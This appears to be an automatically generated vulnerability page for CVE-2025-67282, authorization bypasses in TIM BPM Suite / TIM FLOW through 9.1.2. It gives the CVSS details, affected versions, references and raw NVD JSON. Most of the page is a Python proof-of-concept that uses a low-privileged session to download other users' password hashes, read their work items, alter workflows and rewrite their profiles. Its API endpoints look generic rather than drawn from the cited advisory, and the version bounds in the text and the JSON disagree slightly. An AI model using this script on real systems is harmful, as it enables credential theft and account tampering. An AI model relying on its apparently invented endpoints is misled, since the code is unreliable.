Security Vulnerability Report
CVE-2025-67282 CVSS 5.4 MEDIUM

CVE-2025-67282

Published: 2026-01-09 16:16:08
Last Modified: 2026-01-22 21:32:26

Description

In TIM BPM Suite / TIM FLOW through 9.1.2, multiple Authorization Bypass vulnerabilities exist which allow a low-privileged user to download the password hashes of other users, access the work items of other users, modify restricted content in workflows, modify the application's logo, and manipulate the profiles of other users.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:* - VULNERABLE
TIM BPM Suite <= 9.1.2
TIM FLOW <= 9.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-67282 Authorization Bypass PoC
# Target: TIM BPM Suite / TIM FLOW <= 9.1.2
import requests

# Placeholder values: replace with the instance and session under authorized test
TARGET_URL = "https://target-server.com"
ATTACKER_TOKEN = "attacker_session_token"
TARGET_USER_ID = "victim_user_id"

# All requests are sent with the low-privileged user's own session token
headers = {
    "Authorization": f"Bearer {ATTACKER_TOKEN}",
    "Content-Type": "application/json",
}


# PoC 1: Download other user's password hash
def download_password_hash():
    endpoint = f"{TARGET_URL}/api/users/{TARGET_USER_ID}/password-hash"
    response = requests.get(endpoint, headers=headers)
    print(f"Password Hash Response: {response.status_code}")
    return response.json()


# PoC 2: Access other user's work items
def access_work_items():
    endpoint = f"{TARGET_URL}/api/workitems?userId={TARGET_USER_ID}"
    response = requests.get(endpoint, headers=headers)
    print(f"Work Items Response: {response.status_code}")
    return response.json()


# PoC 3: Modify restricted workflow content
def modify_workflow():
    endpoint = f"{TARGET_URL}/api/workflows/restricted-content"
    payload = {
        "content": "malicious_content",
        "targetUserId": TARGET_USER_ID,
    }
    response = requests.post(endpoint, headers=headers, json=payload)
    print(f"Workflow Modify Response: {response.status_code}")
    return response.json()


# PoC 4: Manipulate other user's profile
def manipulate_profile():
    endpoint = f"{TARGET_URL}/api/users/{TARGET_USER_ID}/profile"
    payload = {
        "email": "[email protected]",
        "phone": "+1234567890",
    }
    response = requests.put(endpoint, headers=headers, json=payload)
    print(f"Profile Manipulate Response: {response.status_code}")
    return response.json()


if __name__ == "__main__":
    print("Testing CVE-2025-67282 Authorization Bypass")
    download_password_hash()
    access_work_items()
    modify_workflow()
    manipulate_profile()
```

References

- https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes (Release Notes)
- https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/ (Third Party Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-67282", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:07.623", "lastModified": "2026-01-22T21:32:26.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In TIM BPM Suite/ TIM FLOW through 9.1.2 multiple Authorization Bypass vulnerabilities exists which allow a low privileged user to download password hashes of other user, access work items of other user, modify restricted content in workflows, modify the applications logo and manipulate the profile of other user."}, {"lang": "es", "value": "En TIM BPM Suite/ TIM FLOW a través de 9.1.2 existen múltiples vulnerabilidades de omisión de autorización que permiten a un usuario con pocos privilegios descargar hashes de contraseñas de otros usuarios, acceder a elementos de trabajo de otros usuarios, modificar contenido restringido en flujos de trabajo, modificar el logotipo de las aplicaciones y manipular el perfil de otros usuarios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tim-solutions:tim_flow:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.1.2", "matchCriteriaId": "071D6670-88DB-4539-A1F9-1850251BDD53"}]}]}], "references": [{"url": "https://tim-doc.atlassian.net/wiki/spaces/eng/pages/230981636/Release+Notes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.y-security.de/news-en/tim-bpm-suite-tim-flow-multiple-vulnerabilities/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
```